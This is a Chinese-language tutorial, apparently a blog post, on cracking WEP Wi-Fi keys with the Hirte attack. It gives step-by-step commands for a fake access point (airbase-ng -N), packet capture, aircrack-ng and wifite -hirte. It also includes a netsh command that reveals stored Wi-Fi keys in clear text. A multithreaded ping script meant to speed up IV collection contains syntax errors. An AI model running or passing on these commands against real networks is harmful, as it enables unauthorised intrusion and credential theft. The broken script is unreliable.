WEP-渗透WEP新思路--Hirte

目录

一.Hirte介绍

二.Hirte破解原理

三.破解方式1

1.查看网卡信息

2.监听网卡

3.扫描附近的wifi

4.配置airodump-ng捕捉数据包并保存数据包文件名字为HSEK

5.开始伪造AP,用airbase-ng工具建立WEP接入点

6.只要有客户端连上来,就会进行攻击

7.启动aircrack-ng从捕获的数据包中解密

 可能出现的错误及解决方法:

 四.破解方式2(比1好用多了)

1.扫描并指定破解方式

2.加速ivs收集

3.开启攻击脚本

4.获得密钥


一.Hirte介绍

Hirte是破解无线网络WEP key的一种攻击类型

只要客户端设备(笔记本,手机等)连接过无线网络,哪些wifi即使是不再攻击者范围内也能被破解,因为该wifi的WEP密钥和配置文件仍然存储再这些无线设备中

netsh wlan show profile name="wifi_name" key=clear

在cmd中输入上列代码,即可查看已连接过WiFi的相关信息

实施这种攻击的要求是建立一个和WEP网络相同的SSID假冒接入点,当客户端设备尝试自动连接无线网络时,假冒接入点(攻击者机器)会对受害者设备进行ARP攻击,导致受害者设备将包含密钥流数据包发出

二.Hirte破解原理

1.安装一个假的WEP AP(wifi名,mac地址要相同)并等待客户端连接

假的AP将他的信标帧和真的AP放到同一个信道上,都叫做wifi_name,这时候客户端无法分清哪个是真的哪个是假的,就两个都发,

就像快递一样,把你家的门牌号涂改成邻居家的门牌号,快递小哥给邻居家送快递的时候就有可能送到你家

2.客户端的连接等待自动分配IP地址(可能会卡在这一步,因为kali自身的问题)

3.客户端发送一个ARP数据包

4.获得了ARP分组,并且将其转换成一个ARP请求为同一客户机

5.客户回复

6.收集这些数据包

7.破解WEP密钥

三.破解方式1

1.查看网卡信息

ip a

2.监听网卡

airmon-ng start wlan0

3.扫描附近的wifi

airodump-ng wlan0mon

4.配置airodump-ng捕捉数据包并保存数据包文件名字为HSEK

airodump-ng wlan0mon --bssid ?? --write HSEK

5.开始伪造AP,用airbase-ng工具建立WEP接入点

airbase-ng -c 1 -a ? --essid "?" -W 1 -N wlan0mon

参数说明:

-c 信道

-a 模拟AP的mac地址

--essid:wifi的名称

-W:设置加密位

-N:使用Hirte攻击模式

wlan0mon:是接口

6.只要有客户端连上来,就会进行攻击

WEP-渗透WEP新思路--Hirte_第1张图片

 D8.....是网卡

18:。。。。是客户端

模拟客户端和AP进行通讯

7.启动aircrack-ng从捕获的数据包中解密

aircrack-ng HSEK-01.cap

破解密码是有要求的,第一次ivs必须要大于5000(#Date那一栏),当小于这个数的话,就会提示数量不足 

WEP-渗透WEP新思路--Hirte_第2张图片

 数量够多,且成功的话,有下图提示

WEP-渗透WEP新思路--Hirte_第3张图片

 可能出现的错误及解决方法:

1.出现连接不上,ping请求超时

解决:断开ARP攻击,让客户端连接起来或ping成功后在攻击

WEP-渗透WEP新思路--Hirte_第4张图片

 四.破解方式2(比1好用多了)

1.扫描并指定破解方式

wifite -wep -hirte

2.加速ivs收集

ping -t 192.168.1.1

3.开启攻击脚本

启动cmd.py

import os
import threading
import time

class myThread (threading.Thread);
    def __init__(self):
        threading.Thread.__init__(self)
    def run(self):
        cmd="ping /t 192.168.1.1"
        os.system(cmd)
        time.sleep(0.1)

threads=[]

for i in range(50)
    thread1 = myThread()
    thread1.start()
    threads.append(thread1)

for item in threads:
    item.join()
print ("退出主线程")

4.获得密钥

WEP-渗透WEP新思路--Hirte_第5张图片

你可能感兴趣的:(无线安全渗透与防御,网络安全)